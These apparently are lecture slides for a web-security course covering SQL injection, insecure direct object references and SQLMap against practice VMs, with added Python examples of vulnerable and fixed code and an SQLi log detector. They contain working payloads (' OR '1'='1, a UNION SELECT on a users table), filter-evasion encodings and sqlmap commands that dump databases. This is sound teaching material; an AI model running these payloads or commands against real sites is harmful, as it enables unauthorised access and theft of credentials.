VU21997 - Expose Website Security Vulnerabilities - Class 4 SQLMap Final


Expose Website Security Vulnerabilities
SQLMap, IDOR

SQLi recap

• Now we know: not as easy as it sounds!
• It gets easier with practice: commit to at least two short practice sessions this week
• What tools do we have in our toolbox? ("SQLi payloads")
  • AND/OR, e.g. 1=1 or '1'='1'
  • Comments (what 3 styles do we know?)
  • select * from ABC … UNION select * from CredentialsTable
  • URL encoding: is 'space' forbidden? Try %20. Tab = %09. Newline = %0A (carriage return = %0D). Hash # = %23
• Where can we apply our payloads?
  • In any vulnerable input field
  • It's easy in-browser: www.fakefacebook.com/login?user=jeff&pass=' OR 1=1
  • A bit harder: USER-AGENT=SELECT * FROM CredentialsTable
  • What software have we used that manipulates HTTP packets?
  • Where else could we try to inject commands?
Insecure Direct Object Reference

• Review AAA:
  • What does Authentication mean?
  • What does Authorisation mean?
  • What does Accounting mean?
  • Who are you? Can you do that? How much did you use? (billing/auditing)
• Power company emailed you: your bill is ready:
  http://www.powerRus.com.au/bills/bill.php?bill_id=12345
• Have you ever tried changing 12345 to 12346?
  • Did it work?
  • If it did and you just saw someone else's bill: Insecure Direct Object Reference
  • Which AAA principle wasn't followed?

Sounds too easy. Must not be common, right?

• https://nakedsecurity.sophos.com/2017/01/26/how-one-man-could-have-deleted-any-public-facebook-video/
• Facebook fixed the vulnerability in July and awarded Melamed a $10,000 bug bounty
How can we exploit IDOR?

• Download Web for Pentester 2 and create a VM (VMNet: NAT, RAM=1GB)
• Start your VM, get the IP address. On your host, browse to the IP
• Open Authorisation, Exercise 1 and 2
  • Document Management System
  • Logging off should stop you from accessing any document
  • You should only be allowed to see your own documents
• Try exercises 1-3
  • Exercise 3 is harder

Pentester II: Authorisation Lab 1-3 (30 minutes)

• Proper operation: log in and you can only see your docs. Log off and you lose access.
• Improper operation: can I access someone else's docs? Can I still access documents after I log off?
• Hint: look at the URL bar when you log in and click on a document. What changes between Confidential document #1 and Confidential document #2?
• Too easy? Instead of modifying the URL in your browser, try using BurpSuite and intercept the packet.
Exercise 1

• I logged in and found a document:
  http://192.168.2.143/authorization/example1/infos/2
  (Copy this into Notepad; we'll try this later.)
• Log out: should I still have access?
• What happens if I type the address in manually?
  • I'm logged out: I should have *no* access to documents
  • The system is not validating that we are authorised; it just trusts the URL we type
Exercise 2

• Try the same trick again: can I access a document while logged out?
  • Nope: if I log out, I lose all access (back to the login page: authorisation check)
• Log in as User1 and open the document. Look at the URLs:
  • Document 1: http://192.168.2.143/authorization/example2/infos/1
  • Document 2: http://192.168.2.143/authorization/example2/infos/2
• What's the URL for #3? Try http://192.168.2.143/authorization/example2/infos/3
• Document #1: user1's doc (my account). Document #3: user2's? Jackpot!
Exercise 3

• New feature in the website: Edit
• What do edit URLs look like?
  • http://192.168.2.143/authorization/example3/infos/edit/1
  • http://192.168.2.143/authorization/example3/infos/edit/2
• What about #3?
  • http://192.168.2.143/authorization/example3/infos/edit/3
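What the three exercises look like from the server side, as an added Python example (not the lab's own code): the exercise 1 and 2 handlers show the two missing checks, and the fixed handlers show the ownership check that closes the IDOR for both the view and the edit URL. The documents, users and session ids are constructed sample data.

```python
# Constructed data standing in for the lab's Document Management System (not the lab's code).
DOCUMENTS = {
    1: {"owner": "user1", "body": "Confidential document #1"},
    2: {"owner": "user1", "body": "Confidential document #2"},
    3: {"owner": "user2", "body": "Confidential document #3"},
}
SESSIONS = {"sess-user1": "user1", "sess-user2": "user2"}  # session cookie -> logged-in user


def infos_example1(session_id, doc_id):
    """Exercise 1 behaviour: the id in the URL is trusted, nobody asks who is requesting."""
    return DOCUMENTS.get(doc_id)


def infos_example2(session_id, doc_id):
    """Exercise 2 behaviour: authenticates (logged in?) but never authorises (is it yours?)."""
    if session_id not in SESSIONS:
        return None  # back to the login page
    return DOCUMENTS.get(doc_id)


def _owned_document(session_id, doc_id):
    """Authenticate, then authorise: return the document only if the caller owns it."""
    user = SESSIONS.get(session_id)
    if user is None:
        return None  # not logged in
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != user:
        return None  # unknown id and someone else's id get the same answer: ids reveal nothing
    return doc


def infos_fixed(session_id, doc_id):
    """/infos/<id> with the ownership check that closes the IDOR."""
    return _owned_document(session_id, doc_id)


def edit_fixed(session_id, doc_id, new_body):
    """/infos/edit/<id> (exercise 3): the edit path needs exactly the same check as the view path."""
    doc = _owned_document(session_id, doc_id)
    if doc is None:
        return False
    doc["body"] = new_body
    return True
```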
Other popular IDOR

• http://www.cvedetails.com/google-search-results.php?q=direct+object+reference
• 5 minutes: who can find the most popular / worst-sounding IDOR vulnerability?
SQLi Review (15 minutes)

1. Recall: if I'm logging in, what might the SQL look like?
   SELECT password FROM logins WHERE user='test'
2. Try to locate where you can inject:
   SELECT password FROM logins WHERE user='______'
3. Try injecting some SQL:
   SELECT password FROM logins WHERE user='' OR '1'='1'

• Can you still remember how to inject SQL commands? Reminders:
  • Lab #1: replace 'name=root' in the URL with your correctly formatted command
  • #2 and #3: spaces are filtered; what else could we use?
  • #4: now we need to inject into the id field instead
  • #5: our id parameter must start with a number
  • #6: our id parameter must end with a number
  • Optional/Advanced: #7: start and end with a number; #8: time-based attack; #9: ORDER BY injection
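The login query from steps 1-3 (and the payload toolbox in the recap) written both ways, as an added Python/sqlite3 example that is not from the slides: the concatenated form is bypassed by the ' OR '1'='1 and comment payloads, the parameterised form is the fix. The logins table and its rows are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's logins table (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO logins VALUES (?, ?)",
                     [("test", "s3cret"), ("admin", "hunter2")])
    return conn


def lookup_vulnerable(conn, user):
    """The slide's query built by string concatenation: the input becomes part of the SQL text."""
    sql = "SELECT password FROM logins WHERE user='" + user + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user):
    """Same query with a bound parameter: the input is passed as data and never parsed as SQL."""
    sql = "SELECT password FROM logins WHERE user=?"
    return [row[0] for row in conn.execute(sql, (user,))]


if __name__ == "__main__":
    db = make_db()
    # Payloads from the slides. SQLite comments end a line with "--"; MySQL also accepts "#" (%23).
    for payload in ["test", "' OR '1'='1", "admin'-- "]:
        print(repr(payload), "vulnerable:", lookup_vulnerable(db, payload),
              "safe:", lookup_safe(db, payload))
```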
SQLMap

• Tool for automating the detection/exploitation of SQL injection vulnerabilities
• Python based
• It is not as smart as you!
  • But great for automating / finding the easy stuff
• SQLMap needs a URL that it can examine for injection:
  • e.g. http://www.website.com/login?user=johndoe
• Try running against your Web for Pentester 1 VM
  • SQL Injection Exercise 1 URL: http://192.168.2.141/sqli/example1.php?name=root

Copyright GBHackers, https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
SQLMap

• Try it yourself:
  sqlmap -u http://<WebForPentesterTarget_IP>/sqli/example1.php?name=root
• You will be asked some questions. What do you think these messages mean?
  • Risk = could this break things? (i.e. accidentally update all entries in a table)
  • Level = do I only use common payloads (e.g. 1=1) or really rare ones too? (slow)
  • Start with the defaults (risk=1, level=1). Maximums are risk=5, level=3 but can be dangerous
• What about the second message? (Keep testing for other parameters)
SQLMap Result: initial tests

sqlmap -u http://1.1.1.1/sqli/example1.php?name=root

• Found an injection point: the name parameter isn't being checked/filtered
• Injection successful: save our work (i.e. remember how we did this so we can skip the detection stuff next time)
• Now try:
  cd /root/.sqlmap/output/192.168.2.141/dump/exercises
  cat users.csv
• What do you see?
SQLMap didn't work!

• Try using some parameters to change sqlmap's behaviour:
  --dbms=mysql            # Let's assume the database is MySQL
  --tamper=space2comment  # Server is filtering spaces; swap them for comments like /**/ instead
• What else can we try?
  • Level and Risk
  • Anything else??
  • Give SQLMap a hint/head start. * means "try injecting commands here:"
SQLMap example: exercise 7

• SQLMap fails on exercise 7: the filters are too good.
• Exercises 5 and 6 forced the input to either begin or end with a number (regular expression), e.g. injecting 1=1# won't work since it doesn't end with a number
• For exercise 7, what if we tried:
  1=1<newline>
  UNION SELECT 1,2,3,4,5 FROM … where 1=1
• It starts with a number and it ends with a number
• This should work:
  http://192.168.2.141/sqli/example7.php?id=1%0A UNION SELECT name,passwd,3,4,5 FROM users WHERE 9=9
SQLMap example: exercise 7

• Now tell SQLMap where to inject with the * character:
  sqlmap -u http://192.168.2.141/sqli/example7.php?id=2%0A* --dump
• i.e. after the newline (%0A), try a number of SQL payloads

[Screenshot captions: "Not looking good..", "Spoke too soon", "Success! Database dumped."]
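The defender's view of the tricks used on these slides (the %0A newline, the /**/ space2comment tamper, the ' OR '1'='1 payload): an added Python example, not from the slides, that scans web-server access-log lines, URL-decodes and normalises each query string, and flags the payload patterns. The log lines, client IP and timestamps are constructed, and the Apache common log format is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not captured traffic), modelled on the requests in these
# exercises: a normal lookup, the ' OR '1'='1 payload, the exercise-7 newline/UNION request,
# a space2comment-style request and a harmless id lookup.
SAMPLE_LOG = """\
192.168.2.10 - - [10/Mar/2024:10:01:02 +1100] "GET /sqli/example1.php?name=root HTTP/1.1" 200 512
192.168.2.10 - - [10/Mar/2024:10:01:09 +1100] "GET /sqli/example1.php?name=root%27%20OR%20%271%27=%271 HTTP/1.1" 200 1480
192.168.2.10 - - [10/Mar/2024:10:02:31 +1100] "GET /sqli/example7.php?id=1%0AUNION%20SELECT%20name,passwd,3,4,5%20FROM%20users%20WHERE%209=9 HTTP/1.1" 200 2210
192.168.2.10 - - [10/Mar/2024:10:03:05 +1100] "GET /sqli/example2.php?name=root%27/**/OR/**/1=1%23 HTTP/1.1" 200 1475
192.168.2.10 - - [10/Mar/2024:10:04:00 +1100] "GET /sqli/example4.php?id=2 HTTP/1.1" 200 500
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Signatures for the slide's toolbox: tautologies and UNION SELECT (checked on normalised SQL),
# comment terminators and the whitespace substitutes %09/%0A/%0D and /**/ (checked on the raw query).
SQL_SIGNATURES = {
    "tautology": re.compile(r"'\s*OR\s*'?1'?\s*=\s*'?1", re.I),
    "union_select": re.compile(r"\bUNION\b.{0,20}\bSELECT\b", re.I),
}
EVASION_SIGNATURES = {
    "comment_terminator": re.compile(r"--\s|#|/\*"),
    "whitespace_substitute": re.compile(r"[\t\r\n]|/\*\*/"),
}


def decode_query(request_path):
    """Return the URL-decoded query string of a request path ('' if there is none)."""
    if "?" not in request_path:
        return ""
    return unquote_plus(request_path.split("?", 1)[1])


def normalise(query):
    """Undo the evasion tricks so the SQL signatures see plain SQL with ordinary spaces."""
    query = re.sub(r"/\*.*?\*/", " ", query)   # space2comment: /**/ back to a space
    return re.sub(r"[\t\r\n]+", " ", query)    # %09 / %0A / %0D back to a space


def scan_log(text):
    """Return [(path, [signature names])] for each request whose query trips a signature."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw = decode_query(match.group(1))
        names = [n for n, rx in SQL_SIGNATURES.items() if rx.search(normalise(raw))]
        names += [n for n, rx in EVASION_SIGNATURES.items() if rx.search(raw)]
        if names:
            hits.append((match.group(1).split("?", 1)[0], names))
    return hits
```

Normalising before matching is what keeps the space2comment and %0A requests from slipping past the tautology and UNION signatures.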
Exercise

• Try SQLMap on all SQLi exercises (even 8 and 9)
• Remember to --purge-output after each success
• Most of the time, it works
• Can you use --dbms, --tamper, and * to make SQLMap work?
